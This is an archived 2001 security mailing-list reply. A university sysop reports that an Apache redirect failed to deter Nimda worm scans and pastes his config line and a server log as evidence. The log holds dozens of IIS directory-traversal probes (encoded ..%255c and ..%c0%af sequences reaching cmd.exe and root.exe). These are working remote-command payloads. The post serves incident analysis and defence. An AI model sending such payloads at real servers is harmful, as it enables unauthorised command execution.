Re: Tracking down the still infected hosts

From: Neil Dickey (neilat_private)
Date: Tue Sep 25 2001 - 11:58:29 PDT

Next message: Skip Carter: "Re: Tracking down the still infected hosts"

Previous message: Fulton L. Preston Jr.: "RE: Tracking down the still infected hosts"
Maybe in reply to: Darren Windham: "Tracking down the still infected hosts"
Next in thread: Skip Carter: "Re: Tracking down the still infected hosts"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Tina Bird <tbird@precision-guesswork.com> wrote:

>Can I ask a question?
>
>According to Ryan Russell (who's been analyzing the
>worm code), Nimda doesn't honor redirects - it just
>checks the response it gets from a Web server to 
>determine whether or not the server is vulnerable.
>It doesn't follow redirects.  So what does this 
>actually accomplish?

In my experience this is correct.  I implemented the
redirect this morning ( 09:00 ), and just got an
extended scan ( 162 hits ) from a source which
appeared to be completely unaffected by the new
setting.

Evidence provided below.

Best regards,

Neil Dickey, Ph.D.
Research Associate/Sysop
Geology Department
Northern Illinois University
DeKalb, Illinois
60115

------------------------------------------------------------------

Here's the line in the configuration file ...

RedirectMatch (.*)\cmd.exe$ http://127.0.0.1

... and here's the log trace:

hs090.fau.edu - - [25/Sep/2001:13:15:21 -0500] "GET /scripts/root.exe?/c+dir 
HTTP/1.0" 404 210
hs090.fau.edu - - [25/Sep/2001:13:15:21 -0500] "GET /scripts/root.exe?/c+dir 
HTTP/1.0" 404 210
hs090.fau.edu - - [25/Sep/2001:13:15:22 -0500] "GET /MSADC/root.exe?/c+dir 
HTTP/1.0" 404 208
hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET /MSADC/root.exe?/c+dir 
HTTP/1.0" 404 208
hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET 
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET 
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET 
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:25 -0500] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:28 -0500] "GET 
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:29 -0500] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 
302 227
hs090.fau.edu - - [25/Sep/2001:13:15:29 -0500] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:29 -0500] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 
302 227
hs090.fau.edu - - [25/Sep/2001:13:15:29 -0500] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 
302 227
hs090.fau.edu - - [25/Sep/2001:13:15:32 -0500] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system
32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:32 -0500] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 
302 227
hs090.fau.edu - - [25/Sep/2001:13:15:32 -0500] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:55 -0500] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
hs090.fau.edu - - [25/Sep/2001:13:15:55 -0500] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system
32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:56 -0500] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:56 -0500] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
hs090.fau.edu - - [25/Sep/2001:13:15:59 -0500] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:15:59 -0500] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:16:00 -0500] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:16:00 -0500] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
hs090.fau.edu - - [25/Sep/2001:13:16:00 -0500] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
hs090.fau.edu - - [25/Sep/2001:13:16:01 -0500] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:16:01 -0500] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:16:03 -0500] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:16:07 -0500] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
hs090.fau.edu - - [25/Sep/2001:13:16:07 -0500] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
hs090.fau.edu - - [25/Sep/2001:13:16:07 -0500] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227
hs090.fau.edu - - [25/Sep/2001:13:16:07 -0500] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 227

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Skip Carter: "Re: Tracking down the still infected hosts"
Previous message: Fulton L. Preston Jr.: "RE: Tracking down the still infected hosts"
Maybe in reply to: Darren Windham: "Tracking down the still infected hosts"
Next in thread: Skip Carter: "Re: Tracking down the still infected hosts"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Sep 25 2001 - 13:16:38 PDT